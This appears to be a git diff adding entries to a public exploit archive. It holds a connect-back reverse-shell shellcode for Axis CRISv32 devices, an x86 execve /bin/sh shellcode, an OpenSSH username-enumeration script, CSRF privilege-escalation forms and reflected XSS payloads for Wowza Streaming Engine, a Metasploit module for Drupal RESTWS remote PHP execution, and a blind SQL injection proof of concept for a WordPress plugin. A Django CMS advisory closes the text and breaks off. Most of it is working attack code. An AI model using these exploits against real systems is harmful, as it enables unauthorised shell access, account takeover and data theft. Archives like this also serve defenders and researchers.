40128,platforms/lin_x86/shellcode/40128.c,"Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)",2016-07-20,bashis,lin_x86,shellcode,0
40129,platforms/python/webapps/40129.txt,"Django CMS 3.3.0 - (Editor Snippet) Persistent XSS",2016-07-20,Vulnerability-Lab,python,webapps,80
40130,platforms/php/remote/40130.rb,"Drupal RESTWS Module 7.x - Remote PHP Code Execution (Metasploit)",2016-07-20,"Mehmet Ince",php,remote,80
40131,platforms/lin_x86/shellcode/40131.c,"Linux/x86 - execve /bin/sh Shellcode (19 bytes)",2016-07-20,sajith,lin_x86,shellcode,0
40132,platforms/windows/local/40132.txt,"Wowza Streaming Engine 4.5.0 - Local Privilege Escalation",2016-07-20,LiquidWorm,windows,local,0
40133,platforms/multiple/webapps/40133.html,"Wowza Streaming Engine 4.5.0 - Remote Privilege Escalation",2016-07-20,LiquidWorm,multiple,webapps,8088
40134,platforms/multiple/webapps/40134.html,"Wowza Streaming Engine 4.5.0 - Add Advanced Admin CSRF",2016-07-20,LiquidWorm,multiple,webapps,8088
40135,platforms/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple XSS",2016-07-20,LiquidWorm,multiple,webapps,8088
40136,platforms/linux/remote/40136.py,"OpenSSHD <= 7.2p2 - Username Enumeration",2016-07-20,0_o,linux,remote,22
40137,platforms/php/webapps/40137.html,"WordPress Video Player Plugin 1.5.16 - SQL Injection",2016-07-20,"David Vaartjes",php,webapps,80

Can't render this file because it is too large.

115
platforms/lin_x86/shellcode/40128.c Executable file
View file

@ -0,0 +1,115 @@
/*
* Title: Axis Communication Linux/CRISv32 - Connect Back Shellcode
* Author: bashis <mcw noemail.eu> / 2016
*
*/
#include <stdio.h>
char sc[] =
//close(0)
"\x7a\x86" // clear.d r10
"\x5f\x9c\x06\x00" // movu.w 0x6,r9
"\x3d\xe9" // break 13
//close(1)
"\x41\xa2" // moveq 1,r10
"\x5f\x9c\x06\x00" // movu.w 0x6,r9
"\x3d\xe9" // break 13
//close(2)
"\x42\xa2" // moveq 2,r10
"\x5f\x9c\x06\x00" // movu.w 0x6,r9
"\x3d\xe9" // break 13
//
"\x10\xe1" // addoq 16,sp,acr
"\x42\x92" // moveq 2,r9
"\xdf\x9b" // move.w r9,[acr]
"\x10\xe1" // addoq 16,sp,acr
"\x02\xf2" // addq 2,acr
//PORT 443
"\x5f\x9e\x01\xbb" // move.w 0xbb01,r9
"\xdf\x9b" // move.w r9,[acr]
"\x10\xe1" // addoq 16,sp,acr
"\x6f\x96" // move.d acr,r9
"\x04\x92" // addq 4,r9
//IP 192.168.57.1
"\x6f\xfe\xc0\xa8\x39\x01" // move.d 139a8c0,acr
"\xe9\xfb" // move.d acr,[r9]
//
//socket()
"\x42\xa2" // moveq 2,r10
"\x41\xb2" // moveq 1,r11
"\x7c\x86" // clear.d r12
"\x6e\x96" // move.d $sp,$r9
"\xe9\xaf" // move.d $r10,[$r9+]
"\xe9\xbf" // move.d $r11,[$r9+]
"\xe9\xcf" // move.d $r12,[$r9+]
"\x41\xa2" // moveq 1,$r10
"\x6e\xb6" // move.d $sp,$r11
"\x5f\x9c\x66\x00" // movu.w 0x66,$r9
"\x3d\xe9" // break 13
//
"\x6a\x96" // move.d $r10,$r9
"\x0c\xe1" // addoq 12,$sp,$acr
"\xef\x9b" // move.d $r9,[$acr]
"\x0c\xe1" // addoq 12,$sp,$acr
"\x6e\x96" // move.d $sp,$r9
"\x10\x92" // addq 16,$r9
"\x6f\xaa" // move.d [$acr],$r10
"\x69\xb6" // move.d $r9,$r11
"\x50\xc2" // moveq 16,$r12
//
// connect()
"\x6e\x96" // move.d $sp,$r9
"\xe9\xaf" // move.d $r10,[$r9+]
"\xe9\xbf" // move.d $r11,[$r9+]
"\xe9\xcf" // move.d $r12,[$r9+]
"\x43\xa2" // moveq 3,$r10
"\x6e\xb6" // move.d $sp,$r11
"\x5f\x9c\x66\x00" // movu.w 0x66,$r9
"\x3d\xe9" // break 13
//
//dup(1)
"\x6f\xaa" // move.d [$acr],$r10
"\x41\xb2" // moveq 1,$r11
"\x5f\x9c\x3f\x00" // movu.w 0x3f,$r9
"\x3d\xe9" // break 13
//
//dup(2)
"\x6f\xaa" // move.d [$acr],$r10
"\x42\xb2" // moveq 2,$r11
"\x5f\x9c\x3f\x00" // movu.w 0x3f,$r9
"\x3d\xe9" // break 13
//execve("/bin/sh",NULL,NULL)
"\x90\xe2" // subq 16,$sp
"\x6e\x96" // move.d $sp,$r9
"\x6e\xa6" // move.d $sp,$10
"\x6f\x0e\x2f\x2f\x62\x69" // move.d 69622f2f,$r0
"\xe9\x0b" // move.d $r0,[$r9]
"\x04\x92" // addq 4,$r9
"\x6f\x0e\x6e\x2f\x73\x68" // move.d 68732f6e,$r0
"\xe9\x0b" // move.d $r0,[$r9]
"\x04\x92" // addq 4,$r9
"\x79\x8a" // clear.d [$r9]
"\x04\x92" // addq 4,$r9
"\x79\x8a" // clear.d [$r9]
"\x04\x92" // addq 4,$r9
"\xe9\xab" // move.d $r10,[$r9]
"\x04\x92" // addq 4,$r9
"\x79\x8a" // clear.d [$r9]
"\x10\xe2" // addq 16,$sp
"\x6e\xf6" // move.d $sp,$acr
"\x6e\x96" // move.d $sp,$r9
"\x6e\xb6" // move.d $sp,$r11
"\x7c\x86" // clear.d $r12
"\x4b\x92" // moveq 11,$r9
"\x3d\xe9"; // break 13
void
main(void)
{
void (*s)(void);
printf("sc size %d\n", sizeof(sc));
s = sc;
s();
}

37
platforms/lin_x86/shellcode/40131.c Executable file
View file

@ -0,0 +1,37 @@
/*
# Linux/x86 - execve /bin/sh shellcode (19 bytes)
# Author: sajith
# Tested on: i686 GNU/Linux
# Shellcode Length: 19
# SLAE - 750
Disassembly of section .text:
08048060 <_start>:
8048060: 31 c0 xor eax,eax
8048062: 50 push eax
8048063: 68 2f 2f 73 68 push 0x68732f2f
8048068: 68 2f 62 69 6e push 0x6e69622f
804806d: 87 e3 xchg ebx,esp
804806f: b0 0b mov al,0xb
8048071: cd 80 int 0x80
===============poc by sajith shetty=========================
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xb0\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

157
platforms/linux/remote/40136.py Executable file
View file

@ -0,0 +1,157 @@
#!/usr/bin/python
#
# CVEs: CVE-2016-6210 (Credits for this go to Eddie Harari)
#
# Author: 0_o -- null_null
# nu11.nu11 [at] yahoo.com
# Oh, and it is n-u-one-one.n-u-one-one, no l's...
# Wonder how the guys at packet storm could get this wrong :(
#
# Date: 2016-07-19
#
# Purpose: User name enumeration against SSH daemons affected by CVE-2016-6210.
#
# Prerequisites: Network access to the SSH daemon.
#
# DISCLAIMER: Use against your own hosts only! Attacking stuff you are not
# permitted to may put you in big trouble!
#
# And now - the fun part :-)
#
import paramiko
import time
import numpy
import argparse
import sys
args = None
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def get_args():
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group()
parser.add_argument("host", type = str, help = "Give SSH server address like ip:port or just by ip")
group.add_argument("-u", "--user", type = str, help = "Give a single user name")
group.add_argument("-U", "--userlist", type = str, help = "Give a file containing a list of users")
parser.add_argument("-e", "--enumerated", action = "store_true", help = "Only show enumerated users")
parser.add_argument("-s", "--silent", action = "store_true", help = "Like -e, but just the user names will be written to stdout (no banner, no anything)")
parser.add_argument("--bytes", default = 50000, type = int, help = "Send so many BYTES to the SSH daemon as a password")
parser.add_argument("--samples", default = 12, type = int, help = "Collect so many SAMPLES to calculate a timing baseline for authenticating non-existing users")
parser.add_argument("--factor", default = 3.0, type = float, help = "Used to compute the upper timing boundary for user enumeration")
parser.add_argument("--trials", default = 1, type = int, help = "try to authenticate user X for TRIALS times and compare the mean of auth timings against the timing boundary")
args = parser.parse_args()
return args
def get_banner(host, port):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(hostname = host, port = port, username = 'invalidinvalidinvalid', password = 'invalidinvalidinvalid')
except:
banner = ssh.get_transport().remote_version
ssh.close()
return banner
def connect(host, port, user):
global args
starttime = 0.0
endtime = 0.0
p = 'B' * int(args.bytes)
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
starttime=time.clock()
try:
ssh.connect(hostname = host, port = port, username = user, password = p, look_for_keys = False, gss_auth = False, gss_kex = False, gss_deleg_creds = False, gss_host = None, allow_agent = False)
except:
endtime=time.clock()
finally:
ssh.close()
return endtime - starttime
def main():
global args
args = get_args()
if not args.silent: print("\n\nUser name enumeration against SSH daemons affected by CVE-2016-6210")
if not args.silent: print("Created and coded by 0_o (nu11.nu11 [at] yahoo.com), PoC by Eddie Harari\n\n")
if args.host:
host = args.host.split(":")[0]
try:
port = int(args.host.split(":")[1])
except IndexError:
port = 22
users = []
if args.user:
users.append(args.user)
elif args.userlist:
with open(args.userlist, "r") as f:
users = f.readlines()
else:
if not args.silent: print(bcolors.FAIL + "[!] " + bcolors.ENDC + "You must give a user or a list of users")
sys.exit()
if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Testing SSHD at: " + bcolors.BOLD + str(host) + ":" + str(port) + bcolors.ENDC + ", Banner: " + bcolors.BOLD + get_banner(host, port) + bcolors.ENDC)
# get baseline timing for non-existing users...
baseline_samples = []
baseline_mean = 0.0
baseline_deviation = 0.0
if not args.silent: sys.stdout.write(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Getting baseline timing for authenticating non-existing users")
for i in range(1, int(args.samples) + 1):
if not args.silent: sys.stdout.write('.')
if not args.silent: sys.stdout.flush()
sample = connect(host, port, 'foobar-bleh-nonsense' + str(i))
baseline_samples.append(sample)
if not args.silent: sys.stdout.write('\n')
# remove the biggest and smallest value
baseline_samples.sort()
baseline_samples.pop()
baseline_samples.reverse()
baseline_samples.pop()
# do math
baseline_mean = numpy.mean(numpy.array(baseline_samples))
baseline_deviation = numpy.std(numpy.array(baseline_samples))
if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Baseline mean for host " + host + " is " + str(baseline_mean) + " seconds.")
if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Baseline variation for host " + host + " is " + str(baseline_deviation) + " seconds.")
upper = baseline_mean + float(args.factor) * baseline_deviation
if not args.silent: print(bcolors.WARNING + "[*] " + bcolors.ENDC + "Defining timing of x < " + str(upper) + " as non-existing user.")
if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Testing your users...")
#
# Get timing for the given user name...
#
for u in users:
user = u.strip()
enum_samples = []
enum_mean = 0.0
for t in range(0, int(args.trials)):
timeval = connect(host, port, user)
enum_samples.append(timeval)
enum_mean = numpy.mean(numpy.array(enum_samples))
if (enum_mean < upper):
if not (args.enumerated or args.silent) :
print(bcolors.FAIL + "[-] " + bcolors.ENDC + user + " - timing: " + str(enum_mean))
else:
if not args.silent:
print(bcolors.OKGREEN + "[+] " + bcolors.ENDC + user + " - timing: " + str(enum_mean))
else:
print(user)
if __name__ == "__main__":
main()

60
platforms/multiple/webapps/40133.html Executable file
View file

@ -0,0 +1,60 @@
<!--
Wowza Streaming Engine 4.5.0 Remote Privilege Escalation Exploit
Vendor: Wowza Media Systems, LLC.
Product web page: https://www.wowza.com
Affected version: 4.5.0 (build 18676)
Platform: JSP
Summary: Wowza Streaming Engine is robust, customizable, and scalable
server software that powers reliable video and audio streaming to any
device. Learn the benefits of using Wowza Streaming Engine to deliver
high-quality live and on-demand video content to any device.
Desc: The application suffers from a privilege escalation issue. Normal
user (read-only) can elevate his/her privileges by sending a POST request
seting the parameter 'accessLevel' to 'admin' gaining admin rights and/or
setting the parameter 'advUser' to 'true' and '_advUser' to 'on' gaining
advanced admin rights.
Advanced Admin:
Allow access to advanced properties and features
Only for expert Wowza Streaming Engine users.
Tested on: Winstone Servlet Engine v1.0.5
Servlet/2.5 (Winstone/1.0.5)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5340
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5340.php
03.07.2016
--
Privilege escalation from existing read-only user to admin(advanced):
-->
<html>
<body>
<form action="http://localhost:8088/enginemanager/server/user/edit.htm" method="POST">
<input type="hidden" name="version" value="0" />
<input type="hidden" name="action" value="quickEdit" />
<input type="hidden" name="userName" value="usermuser" />
<input type="hidden" name="userPassword" value="" />
<input type="hidden" name="userPassword2" value="" />
<input type="hidden" name="accessLevel" value="admin" />
<input type="hidden" name="advUser" value="true" />
<input type="hidden" name="&#95;advUser" value="on" />
<input type="hidden" name="ignoreWarnings" value="false" />
<input type="submit" value="God mode" />
</form>
</body>
</html>

52
platforms/multiple/webapps/40134.html Executable file
View file

@ -0,0 +1,52 @@
<!--
Wowza Streaming Engine 4.5.0 CSRF Add Advanced Admin Exploit
Vendor: Wowza Media Systems, LLC.
Product web page: https://www.wowza.com
Affected version: 4.5.0 (build 18676)
Platform: JSP
Summary: Wowza Streaming Engine is robust, customizable, and scalable
server software that powers reliable video and audio streaming to any
device. Learn the benefits of using Wowza Streaming Engine to deliver
high-quality live and on-demand video content to any device.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: Winstone Servlet Engine v1.0.5
Servlet/2.5 (Winstone/1.0.5)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5341
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5341.php
03.07.2016
--
-->
<html>
<body>
<form action="http://localhost:8088/enginemanager/server/user/edit.htm" method="POST">
<input type="hidden" name="version" value="0" />
<input type="hidden" name="action" value="new" />
<input type="hidden" name="userName" value="thricer" />
<input type="hidden" name="userPassword" value="123123" />
<input type="hidden" name="userPassword2" value="123123" />
<input type="hidden" name="accessLevel" value="admin" />
<input type="hidden" name="advUser" value="true" />
<input type="hidden" name="&#95;advUser" value="on" />
<input type="hidden" name="ignoreWarnings" value="false" />
<input type="submit" value="Execute" />
</form>
</body>
</html>

117
platforms/multiple/webapps/40135.txt Executable file
View file

@ -0,0 +1,117 @@

Wowza Streaming Engine 4.5.0 Multiple Cross-Site Scripting Vulnerabilities
Vendor: Wowza Media Systems, LLC.
Product web page: https://www.wowza.com
Affected version: 4.5.0 (build 18676)
Platform: JSP
Summary: Wowza Streaming Engine is robust, customizable, and scalable
server software that powers reliable video and audio streaming to any
device. Learn the benefits of using Wowza Streaming Engine to deliver
high-quality live and on-demand video content to any device.
Desc: Wowza Streaming Engine suffers from multiple reflected cross-site
scripting vulnerabilities when input passed via several parameters to
several scripts is not properly sanitized before being returned to the
user. This can be exploited to execute arbitrary HTML and script code
in a user's browser session in context of an affected site.
Tested on: Winstone Servlet Engine v1.0.5
Servlet/2.5 (Winstone/1.0.5)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5343
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5343.php
03.07.2016
--
http://localhost:8088/enginemanager/applications/live/main/view.htm?vhost=_defaultVHost_&appName=live<script>alert(1)</script>
http://localhost:8088/enginemanager/applications/monitoring/historical.jsdata?vhost=_defaultVHost_&appName=test&periodStart=2016-07-03T13%3A42%3A32%2B02%3A00&periodEnd=2016-07-03T14%3a42%3a32%2b02%3a00<script>alert(2)</script>
http://localhost:8088/enginemanager/applications/monitoring/historical.jsdata?vhost=_defaultVHost_&appName=test&periodStart=2016-07-03T13%3a42%3a32%2b02%3a00<script>alert(3)</script>&periodEnd=2016-07-03T14%3A42%3A32%2B02%3A00
http://localhost:8088/enginemanager/applications/liveedge/securityplayback/edit.htm?appName=test<script>alert(4)</script>&vhost=_defaultVHost_
---
POST /enginemanager/applications/liveedge/main/edit.htm
Host: localhost:8088
vhost=_defaultVHost_";alert(5)//&uiAppName=test&uiAppType=Live%20Edge%20Application<script>alert(6)</script>&section=main&version=1467548313123&action=new&description=desctest&mpegDash=true&_mpegDash=on&appleHLS=true&_appleHLS=on&adobeRTMP=true&_adobeRTMP=on&adobeHDS=true&_adobeHDS=on&msSmooth=true
---
POST /enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm
Host: localhost:8088
vhost=_defaultVHost_&uiAppName=test";alert(7)//&uiAppType=Live+Edge+Application&instanceName=";alert(8)//&section=publishers_panasonic_camcorder";alert(9)//&version=0&driverName=Panasonic&publishersStreamFileName=panasonicstreamname&cameraIpAddress=1.1.1.1&appType=liveedge";alert(10)//&appName=test
---
POST /enginemanager/applications/liveedge/securityplayback/edit.htm HTTP/1.1
Host: localhost:8088
vhost=_defaultVHost_";alert(11)//&uiAppName=test&uiAppType=Live%20Edge%20Application<script>alert(12)</script>&section=securityplayback&version=1467549110876&_requireSecureRTMPConnection=on&secureTokenState=Protect+all+protocols+using+hash+(SecureToken+version+2)&sharedSecret=sharedtestsecret&hashAlgorithm=SHA
---
POST /enginemanager/applications/liveedge/streamtarget/add.htm HTTP/1.1
Host: localhost:8088
enabled=true&protocol=RTMP&destinationName=akamai&destApplicationRequired=false&destAppInstanceRequired=false&usernameRequired=true&passwordRequired=true&wowzaCloudDestinationType=1*/alert(13)//&facebookAccessToken=&facebookDestName=&facebookDestId=&facebookEventSourceName=&wowzaDotComFacebookUrl=https%3A%2F%2Ffb.wowza.com%2Fwsem%2Fstream_targets%2Fv1&connectionCode=&protocolShoutcast=Shoutcast
---
-------------------------------------------------------------------------------------------------------------------
| Script | Parameter |
-------------------------------------------------------------------------------------------------------------------
| |
/enginemanager/applications/live/main/view.htm | appName |
/enginemanager/applications/liveedge/main/edit.htm | uiAppType |
/enginemanager/applications/liveedge/main/edit.htm | vhost |
/enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm | appType |
/enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm | instanceName |
/enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm | section |
/enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm | uiAppType |
/enginemanager/applications/liveedge/securityplayback/edit.htm | appName |
/enginemanager/applications/liveedge/securityplayback/edit.htm | uiAppType |
/enginemanager/applications/liveedge/securityplayback/edit.htm | vhost |
/enginemanager/applications/liveedge/streamtarget/add.htm | wowzaCloudDestinationType |
/enginemanager/applications/liveedge/streamtarget/wizard.htm | appName |
/enginemanager/applications/liveedge/streamtarget/wizard.htm | vhost |
/enginemanager/applications/monitoring/historical.jsdata | periodEnd |
/enginemanager/applications/monitoring/historical.jsdata | periodStart |
/enginemanager/applications/new.htm | uiAppName |
/enginemanager/server/mediacachesource/edit.htm | action |
/enginemanager/server/mediacachesource/edit.htm | maxTTLDays |
/enginemanager/server/mediacachesource/edit.htm | maxTTLHours |
/enginemanager/server/mediacachesource/edit.htm | maxTTLMinutes |
/enginemanager/server/mediacachesource/edit.htm | maxTTLSeconds |
/enginemanager/server/mediacachesource/edit.htm | minTTLDays |
/enginemanager/server/mediacachesource/edit.htm | minTTLHours |
/enginemanager/server/mediacachesource/edit.htm | minTTLMinutes |
/enginemanager/server/mediacachesource/edit.htm | minTTLSeconds |
/enginemanager/server/mediacachestore/edit.htm | action |
/enginemanager/server/transcoderencode/edit.htm | action |
/enginemanager/server/transcoderencode/edit.htm | appType |
/enginemanager/server/transcoderencode/edit.htm | templateName |
/enginemanager/server/vhost/streamfile/new.htm | streamName |
/enginemanager/transcoder/new.htm | appType |
/enginemanager/transcoder/new.htm | dstTemplate |
/enginemanager/applications/monitoring/app.jsdata | appName |
/enginemanager/applications/monitoring/historical.jsdata | appName |
/enginemanager/applications/monitoring/historical.jsdata | vhost |
/enginemanager/server/logs/getlog.jsdata | filter |
/enginemanager/server/logs/getlog.jsdata | logMode |
/enginemanager/server/logs/getlog.jsdata | logName |
/enginemanager/server/logs/getlog.jsdata | logType |
| |
---------------------------------------------------------------------------------|--------------------------------|

86
platforms/php/remote/40130.rb Executable file
View file

@ -0,0 +1,86 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Drupal RESTWS Module 7.x Remote PHP Code Execution',
'Description' => %q{
This module exploits the Drupal RESTWS module vulnerability.
RESTWS alters the default page callbacks for entities to provide
additional functionality. A vulnerability in this approach allows
an unauthenticated attacker to send specially crafted requests resulting
in arbitrary PHP execution
This module was tested against RESTWS 7.x with Drupal 7.5
installation on Ubuntu server.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Devin Zuczek', # discovery
'Mehmet Ince <mehmet@mehmetince.net>' # msf module
],
'References' =>
[
['URL', 'https://www.drupal.org/node/2765567'],
['URL',
'https://www.mehmetince.net/exploit/drupal-restws-module-7x-remote-php-code-execution']
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => 'Jul 13 2016',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [ true, "The target URI of the
Drupal installation", '/'])
], self.class
)
end
def check
r = rand_text_alpha(8 + rand(4))
url = normalize_uri(target_uri.path, "?q=taxonomy_vocabulary/", r
, "/passthru/echo%20#{r}")
res = send_request_cgi(
'method' => 'GET',
'uri' => url
)
if res && res.body =~ /#{r}/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
random = rand_text_alpha(1 + rand(2))
url = normalize_uri(target_uri.path,
"?q=taxonomy_vocabulary/",
random ,
"/passthru/",
Rex::Text.uri_encode("php -r
'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'")
)
send_request_cgi(
'method' => 'GET',
'uri' => url
)
end
end

116
platforms/php/webapps/40137.html Executable file
View file

@ -0,0 +1,116 @@
<!--
Multiple SQL injection vulnerabilities in WordPress Video Player
Abstract
It was discovered that WordPress Video Player is affected by multiple blind SQL injection vulnerabilities. Using these issues it is possible for a logged on Contributor (or higher) to extract arbitrary data (eg, the Administrator's password hash) from the WordPress database.
Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE ID
OVE-20160712-0004
Tested versions
This issue was successfully tested on WordPress Video Player WordPress plugin version 1.5.16.
Fix
This issue is resolved in WordPress Video Player 1.5.18.
Introduction
WordPress Video Player is a WordPress video plugin that allows you to easily add videos to your website. WordPress Video Player is affected by multiple blind SQL injection vulnerabilities. Using these issues it is possible for a logged on Contributor (or higher) to extract arbitrary data (eg, the Administrator's password hash) from the WordPress database.
Details
The vulnerabilities exist in the functions show_tag(), spider_video_select_playlist(), and spider_video_select_video(). The author tried to prevent SQL injection by calling the esc_sql() WordPress function. However, the user input is used in the ORDER BY clause and is consequently not quoted. Due to this it is possible to inject arbitrary SQL statements despite the use of esc_sql()
show_tag():
[...]
if (isset($_POST['page_number'])) {
if ($_POST['asc_or_desc']) {
$sort["sortid_by"] = esc_sql(esc_html(stripslashes($_POST['order_by'])));
if ($_POST['asc_or_desc'] == 1) {
$sort["custom_style"] = "manage-column column-title sorted asc";
$sort["1_or_2"] = "2";
$order = "ORDER BY " . $sort["sortid_by"] . " ASC";
} else {
$sort["custom_style"] = "manage-column column-title sorted desc";
$sort["1_or_2"] = "1";
$order = "ORDER BY " . $sort["sortid_by"] . " DESC";
}
}
spider_video_select_playlist():
[...]
if(isset($_POST['page_number']))
{
if($_POST['asc_or_desc'])
{
$sort["sortid_by"]=esc_sql(esc_html(stripslashes($_POST['order_by'])));
if($_POST['asc_or_desc']==1)
{
$sort["custom_style"]="manage-column column-title sorted asc";
$sort["1_or_2"]="2";
$order="ORDER BY ".$sort["sortid_by"]." ASC";
}
else
{
$sort["custom_style"]="manage-column column-title sorted desc";
$sort["1_or_2"]="1";
$order="ORDER BY ".$sort["sortid_by"]." DESC";
}
}
function spider_video_select_video():
[...]
if(isset($_POST['page_number']))
{
if($_POST['asc_or_desc'])
{
$sort["sortid_by"]=esc_html(stripslashes($_POST['order_by']));
if($_POST['asc_or_desc']==1)
{
$sort["custom_style"]="manage-column column-title sorted asc";
$sort["1_or_2"]="2";
$order="ORDER BY ".esc_sql($sort["sortid_by"])." ASC";
}
else
{
$sort["custom_style"]="manage-column column-title sorted desc";
$sort["1_or_2"]="1";
$order="ORDER BY ".esc_sql($sort["sortid_by"])." DESC";
}
}
Proof of concept
-->
<html>
<body>
<form action="http://<target>/wp-admin/admin-ajax.php?action=spiderVeideoPlayerselectplaylist" method="POST">
<input type="hidden" name="search_events_by_title" value="" />
<input type="hidden" name="page_number" value="0" />
<input type="hidden" name="serch_or_not" value="" />
<input type="hidden" name="asc_or_desc" value="1" />
<input type="hidden" name="order_by" value="(CASE WHEN (SELECT sleep(10)) = 1 THEN id ELSE title END) ASC #" />
<input type="hidden" name="option" value="com_Spider_Video_Player" />
<input type="hidden" name="task" value="select_playlist" />
<input type="hidden" name="boxchecked" value="0" />
<input type="hidden" name="filter_order_playlist" value="" />
<input type="hidden" name="filter_order_Dir_playlist" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

349
platforms/python/webapps/40129.txt Executable file
View file

@ -0,0 +1,349 @@
Document Title:
===============
Django CMS v3.3.0 - (Editor Snippet) Persistent Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1869
Security Release: https://www.djangoproject.com/weblog/2016/jul/18/security-releases/
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6186
CVE-ID:
=======
CVE-2016-6186
Release Date:
=============
2016-07-19
Vulnerability Laboratory ID (VL-ID):
====================================
1869
Common Vulnerability Scoring System:
====================================
3.5
Product & Service Introduction:
===============================
django CMS is a modern web publishing platform built with Django, the web application framework for perfectionists with deadlines.
django CMS offers out-of-the-box support for the common features youd expect from a CMS, but can also be easily customised and
extended by developers to create a site that is tailored to their precise needs.
(Copy of the Homepage: http://docs.django-cms.org/en/release-3.3.x/upgrade/3.3.html )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered an application-side vulnerability (CVE-2016-6186) in the official Django v3.3.0 Content Management System.
Vulnerability Disclosure Timeline:
==================================
2016-07-03: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2016-07-04 Vendor Notification (Django Security Team)
2016-07-07: Vendor Response/Feedback (Django Security Team)
2016-07-18: Vendor Fix/Patch (Django Service Developer Team)
2016-07-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Divio AG
Product: Django Framework - Content Management System 3.3.0
Divio AG
Product: Django Framework - Content Management System MDB, 1.10, 1.9, 1.8 and 1.7
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Django v3.3.0 Content Management System.
The security vulnerability allows remote attackers or privileged user accounts to inject own malicious script codes to the
application-side of the vulnerable modules web context.
The persistent web vulnerability is located in the `Name` value of the `Editors - Code Snippet` module POST method request.
Remote attackers are able to inject own malicious script code to the snippets name input field to provoke a persistent execution.
The injection point is the snippets add module of the editor. The execution point occurs in the `./djangocms_snippet/snippet/`
data listing after the add. The data context is not escaped or parsed on add to select and thus results in an execute of any
payload inside of the option tag.
The attacker vector of the vulnerability is persistent because of the data is stored on add and request method to inject is POST.
The vulnerability can be exploited against other privileged user accounts of the django application by interaction with already
existing snippets on add.
Already added elements become visible for the other user accounts as well on add interaction. The unescaped data is stored in
the database of the web-application but when rendered in the frontend or in the edit mode, it's properly escaped.
The security risk of the vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5.
Exploitation of the vulnerability requires a low privileged web-application user account and only low user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external
redirects to malicious source and persistent manipulation of affected or connected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Editor - Snippets (Add)
Vulnerable Input(s):
[+] Name
Parameter(s):
[+] select
Affected Module(s):
[+] Snippets Options Listing [./djangocms_snippet/snippet/] - option
Proof of Concept (PoC):
=======================
The application-side validation web vulnerability can be exploited by low and high privileged web-application user accounts with low user interaction.
For security demonstration or to reproduce the application-side web vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Login to your django cms website with version 3.3.0
2. Open the structure module
3. Click to edit a page module
Note: Now the editor opens with the main default plugins
4. Mark a text passage and click to the code snippets plugin that is configured by default installation
5. Click the plus to add a new snippet of code
6. Inject a script code payload in java-script to the input field of the Name
7. Save the entry iva POST method request
8. Now click the box to choose the vulnerable injected payload
9. The script code payload executes in the box listing without secure parse or filter to encode
10. Successful reproduce of the application-side validation vulnerability in the editors snippet module!
Note:
Multiple accounts can be exploited by the inject of snippets. When another privileged user account includes a snippet
